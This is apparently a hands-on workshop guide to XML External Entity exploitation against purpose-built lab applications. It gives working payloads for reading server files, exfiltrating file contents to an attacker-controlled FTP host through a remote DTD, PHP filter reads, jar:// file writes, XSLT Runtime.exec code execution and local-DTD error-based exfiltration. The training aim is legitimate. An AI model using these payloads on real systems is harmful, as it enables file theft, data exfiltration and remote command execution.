Welcome to this 3-hour workshop on XML External Entities (XXE) exploitation!
In this workshop, the latest XML eXternal Entities (XXE) and XML related attack vectors will be presented. XXE is a vulnerability that affects any XML parser that evaluates external entities. It is gaining more visibility with its introduction to the OWASP Top10 2017 (A4). You might be able to detect the classic patterns, but can you convert the vulnerability into directory file listing, binary file exfiltration, file write or remote code execution?
The focus of this workshop will be presenting various techniques and exploitation tricks for both PHP and Java applications. Four applications will be at your disposition to test your skills. For every exercise, sample payloads will be given so that the attendees save some time.
The first requirement is to have a to have an HTTP interception proxy installed.
For the infrastructure, you will need:
In order to do the exercise, you will need to run the lab applications by yourself. All applications were built with a docker container recipe. This should make the deployment easier.
$ git clone https://github.com/GoSecure/xxe-workshop
%application_dir%/README.md) This step will differ for each application.
$ docker-compose up
XML documents are used in plenty of file formats. You have probably already edited a configuration file written in XML. If you have built a website, you will edit or see inevitably HTML. You can also think about MS Office documents (
.docx), Scalable Vector Graphic (
.svg) and SOAP requests. Being widely implemented in most programming language, it is an excellent choice for interoperability. The XML standard describes many useful formatting features but we are going to focus on "entities" because of the potential vulnerability it introduces.
XML entities are reference to XML data inside of XML documents. We are mentioning XML data because it can be a literal string, XML tags or any legal XML syntax where it is inserted.
Entity in HTML are used for special characters
Entity is being used for a repeated pattern
When the keyword SYSTEM is added to an entity, it will attempt to load content from the specified URL. The value between quote is the URL. For XML parsing done in a small script execute locally, this seems like a nice feature. However, when the parsing is done server side, the URLs from SYSTEM entities are also resolved on the server. A malicious user could point to a file hosted on the remote server. If the server return the parsing result, it will suddenly reveal the content of this file.
<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <data>&xxe;</data>
If the application return the value inside the data node, the content of the file
/etc/passwd will be reveal.
passwd is a file that is universally present on Linux operating system.
Hostnames, DNS resolvers and network devices information can give precious information to discover additional assets.
file:///proc/self/net/dev: Include public and internal IP
/proc virtual filesystem include various files describing the current process.
file:///proc/self/cwd/FILE: Relative paths are likely to work.
file:///proc/self/cwd/is an alternative to
file:///proc/self/cmdline: This virtual file is returning the command and the arguments used to start the process.
file:///proc/self/environ: Environment defined in the context of the current process.
There are few files that are containing the system version. These are also files with no special characters (Useful for testing).
For testing purpose, it might be interesting to read virtual file with infinite content. The objective of the attacker would be to either do time based detection or create some sort of Denial of Service (DOS).
For this first exercise, we are using a website that render Atom feed. The service is at the URL : http://xxe-workshop.gosec.co:8021
By submitting the form with the news feed (Atom feed) from the sub-reddit netsec.
For the workshop, you can use your shell to serve HTTP requests. As you can see below, you can start your simple web server with the command :
python -m http.server 8123.
It is always best to start with a simple working XML file rather than submit first a complex and specific payload. Sometime failure to load our XML can be caused by simple syntax issue. XML can be unforgiving regarding the order of XML syntax, mistyped elements and unsupported characters.
Once the file is saved, you can submit a URL to this file. The URL must be public.
The result page should look like the following. It is a confirmation that our base file is valid. An XML file with a format other than Atom will trigger an error.
Next, we will attempt to fetch a file on the file system with an XML Entities. The Atom should look as follows.
As a result, we can see the content of the file
/etc/passwd in the response.
In the source, we can see more easily the content of the file with new lines.
XML parsing remotely will not always return content directly. If you are uploading a document such as a data file (
.xml) or a MS Office document (
.docx), you might not receive the content parse from those documents.
We need to find a way exfiltrate data during the parsing. Unfortunately, it is not possible refer to an entity from another entity in the same DOCTYPE. This limitation comes from the way XML parsers interpret the document.
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE data [ <!ENTITY file SYSTEM "file:///etc/passwd"> <!ENTITY notworking SYSTEM "http://xxe.me/&file;"> ]> <data></data>
This payload will not work
A workaround for this limitation was discovered by researchers Alexey Osipov and Timur Yunusov that allow the construction of URL with data coming from other entities. The first version of this payload uses the Gopher protocol.
The previous technique was updated with a variant. This variant replaces Gopher with the FTP protocol. It is very useful because the Gopher is deprecated and only available on old version of Java.
The following payload requires a remote DTD file to be hosted on a web server. The DTD file is taking care of doing the concatenation. The final objective is to evaluate
ftp://test:%file;@my.ftp.server/. The file content is sent as a password.
<?xml version="1.0"?> <!DOCTYPE data [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % dtd SYSTEM "http://your.host/remote.dtd"> %dtd;]> <data>&send;</data>
<?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'ftp://test:%file;@my.ftp.server/'>"> %all;
In order to capture the file content, you need to record the password sent to your FTP server. To serve this purpose, Ivan Novikov has created a mock FTP server that respond just enough to record a password. (FTP clients will not authenticate if the handshake is incomplete.)
For this second exercise, we are using a website that render SVG image based on the XML given. The service is at the URL : http://xxe-workshop.gosec.co:8022
When reusing the technique we saw in the previous exercise, we can see that the file content is displaying all in one line. This makes it hard to exfiltrate text files. In many real-world cases, the result will simply not be displayed to the user. The parsing will be hidden and possibly done asynchronously.
Now, we are going to attempt to exfiltrate the file with the out-of-bound DTD technique. The XML payload will look as follows:
The DTD reference in the XML payload is a file that is hosted on a server that we control. The DTD serve the purpose of concatenating the file content to the FTP URL.
Instead of using a real FTP server. We will use a dummy one that responds to few FTP command and will display all content received including the password. We are expecting to receive the file content in the password.
shell-workshop.gosec.co is the host from which you are running the mock FTP server. If are running everything locally, you can use
As you can see, the mock FTP service is covering only three FTP commands. You can get the ruby script on the workshop repository.
The payload should look like this.
One easier way to use the encoding tags from the HackVertor plugin. It is a good encoding tool for quickly testing payload without re-encoding the payload on every request.
Every step of the XML parsing is susceptible to fail due to a small error. If you get result different than the screenshot investigate the potential causes.
First, the DTD is fetched. This confirms that our XML payload is well-formed. If it is not the case, verify the URL you specified in the XML entity.
Second, the FTP is contacted. Confirming that the concatenation succeeds.
You can continue exploring the file system by modifying your XML payload and seeing the result on your shell in the dummy FTP server output.
We already mentioned the
php:// protocol. This protocol available - of course - only on PHP is providing few options to encode or decode file content.
XXE have major limitations regarding which file can be read. In general, you can't read non-ASCII characters or special characters that are not XML compatible. You might have noticed when doing the first two exercises.
In order to read file with special characters, we can take advantage of the php protocol.
Reference: php:// - php.net documentation
With this new capability, it opens the door to read most configuration files, database files and more.
Here is an exhaustive list of protocols that could be useful when exploiting XXE.
Access file with relative or absolute path
Nothing surprising here. You can trigger GET request to HTTP service. While it can be a starting point for Server Side Request Forgery (SSRF), the response is not likely to be readable. Most webpages are not perfectly XML valid.
https://169.254.169.254/latest/user-data AWS metadata URLs now require a special header. It is unlikely that you will be able to access it with XXE.
This protocol allows you to connect to a FTP server to read file (would require to know the exact file location and credentials to authenticate) or exfiltrate data (see the next exercise).
Another option for data exfiltration is the gopher protocol. It allows to connect to any server with a TCP with an arbitrary message. The path section of the URL is the data that will be written to the TCP socket. It is rarely available as it requires very old versions of Java.
jar protocol is a very special case. It is only available on Java applications. It allows to access files inside a PKZIP archive (
.jar, ...). You will see in the last exercise how it can be used to write files to a remote server.
This protocol is alternative to the
file:// protocol. It is of limited use. It is often cited as a method to bypass some WAF blocking for specific string such as
For this third exercise, we are using a website that is very similar to the first exercise. It is also parsing Atom feed. It is, however, using a different language : PHP. The service is at the URL : http://xxe-workshop.gosec.co:8022
Similarly to the first exercise, we are going to host a malicious Atom feed on a web server. This XML document will use PHP base64-encoding filter inside an XML entity.
We are targeting the file
/.svn/wc.db a metadata file containing SVN history information. Hopefully, we can obtain additional information on the codebase.
The response will be in Base64 because, this is what we instruct the server to do with the filter. To read the original content, we can decode it with a variety of decoding tools. In Burp, you can press Ctrl-B to decode your selection.
.svn/wc.db file extracted, we can see filenames are exposed including some pages we did not know exist!
The SVN metadata file revealed us that a PHP script was present at
We can use the same filter technique to view the source code of this page. Here is the payload.
When the response is received, we can decode the base 64 blob to view the PHP source.
jar protocol is only available on Java applications. It allows to access files inside a PKZIP file (
It works for local file..
And with remote file..
What is happening behind the scenes with the HTTP URL with a remote ZIP? There are in fact multiple steps that lead to the file being extracted.
What if we manage to stop the sequence at the second step?.. It is possible to do so! The trick is to never close the connection when serving the file on step 2. The client - in this case the web application - will download as much as it can and write the content as it gets. To accomplish this, we need a modified or custom web server that will hang on purpose. You can find two utilities that will serve this purpose on the Github repository (one in python
slow_http_server.py and one in
Once the server has downloadeded your file, you need to find its location by browsing the temp directory. Being random, the file path can't be predict in advance.
Writing files in a temporary directory can help escalate another vulnerability that involves a path traversal (such as local file include, template injection, XSLT RCE, deserialization, etc).
Extensible Stylesheet Language Transformations (or XSLT) is a text format that describes the transformation applied to XML documents. The official specification provides basic transformation. Languages such as Java and .NET have introduced extension to allow the invocation of method from the stylesheet. The Java implementation is more prone to vulnerability being enabled by default. It has the capability to access all class in the classpath.
If you are seeing a feature that allows you to configure an XSLT file in a Java application, remote code execution might be possible.
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:date="http://xml.apache.org/xalan/java/java.util.Date" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:str="http://xml.apache.org/xalan/java/java.lang.String" exclude-result-prefixes="date"> <xsl:output method="text"/> <xsl:template match="/"> <xsl:variable name="cmd"><![CDATA[touch /tmp/test1234]]></xsl:variable> <xsl:variable name="rtObj" select="rt:getRuntime()"/> <xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/> <xsl:text>Process: </xsl:text><xsl:value-of select="$process"/> </xsl:template> </xsl:stylesheet>
In the root node, classes (
java/java.lang.String) are imported for future reference. To customize the previous payload, you need to edit the assignment
touch command can be replaced with any command available on the server.
To exploit this service, we will need to evaluate multiple URLs with the same XXE base payload. To send those similar requests, we can encapsulate the logic inside a script.
Here is a demonstration of the Burp plugin Reissue Request Scripter. The request exported is the POST request to
For this exercise, an exploit script is provided to you. The only segment to edit is the session cookie.
You can test that the script is working properly by evaluating a test file. The script has only one argument the file to evaluate (
python exploit.py [FILE]). In the capture below, we are executing
python exploit.py /etc/issue.
In order to persist a file more than a second, we must serve the file with a web server that will hold connection as long as possible. A simple Tornado server is provided in the workshop repository. You can see in the script that a call to the
sleep function is done to prevent the connection to close when the function return. As soon as the connection would close, the Java application would attempt to extract the ZIP and dispose the file leaving us no time to use the file written to disk.
The file that will be served is malicious stylesheet. For more information, refer to the previous section.
In the following stylesheet, we are invoking the methods
Step 1: Starting the "slow" HTTP server
Step 2: Uploading our file
Step 3: Browsing to find the full path of the file
Step 4: Exploit path traversal
Step 5: Interact with shell
If the XML parsed is not returned and the network out-of-bound channel is not possible (aggressive network filter), would the XML parser be vulnerable in this case? This case was for a few years consider unexploitable.
One of the remaining channels is the error messages. This channel is available if the application is configured to returned detail error messages.
Can we do a concatenation trick without external DTD ? The short answer to the problem is: Yes we can! Arseniy Sharoglazov found an interesting technique that allows us to use a local DTD instead of an external DTD.
We need to find an entity that is declared and use in the same DTD. Here is an example taken from
[...] <!ENTITY % constant '>[MALICIOUS]<!ELEMENT dummy(123 '> <!ELEMENT patelt (%constant;)*> [...]
If we replace the
constant entity by the following XML injection. It would allow us to evaluate arbitrary XML. Our objective is going to do a concatenation within this injection point.
<!ENTITY % constant '>[MALICIOUS]<!ELEMENT dummy(123 '> <!ELEMENT patelt (%constant;)*>
The malicious XML we are looking to inject in the
[MALICIOUS] placeholder is the following:
<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval will be evaluated, the concatenation will occur.
In summary, here are the steps that will be needed during the XML parsing:
The final evaluation should trigger the injection of new entities doing the same concatenation trick used in external DTD.
The payload we are going to send will look like this:
<!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd"> <!ENTITY % constant '><!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"><!ELEMENT dummy(123 '> <!ELEMENT patelt (%constant;)*> %local_dtd; ]> <message></message>
To see it in action, pass to the next section.
If you want to know more about the different injection patterns, visit this blog post: Automating local DTD discovery for XXE exploitation.
At first, we need to build a base payload that simply trigger a
FileNotFoundException. We need to confirm that error message are returned to the client.
In order to find if at least one interesting DTD is present on the remote server, we are going to need to brute force it with a huge list of potential paths.
The content that will change in our request is the path. The XML around this path will not change and it needs to be URL encoded.
Once Intruder is done with the brute force attack, we can filter result with a negative search.
Intruder is not showing the initial value from our list, but the final value encoded. For this reason, we need to decode the path from the request.
Once a DTD with a known overridable entity is found, we can start to poke at files to exfiltrate.
You can reuse a XXE payload from this list. Only the
file entity needs to be changed. The path to the DTD (
local_dtd) and the dummy path (
/nonexistant) will be unmodified.
You can view the complete attack in this video.
Misconfigured XML parser can open doors to attackers. Being able to read files on the vulnerable server is the main concern. But as you saw in this workshop, being able to read key files can lead to escalating to remote command execution.
From a developer perspective, you can prevent such issue by configuring properly the XML parser in used in your application. Few libraries have secure configuration by default but it is best to verify with a reference such as the OWASP Cheat Sheet in the reference below.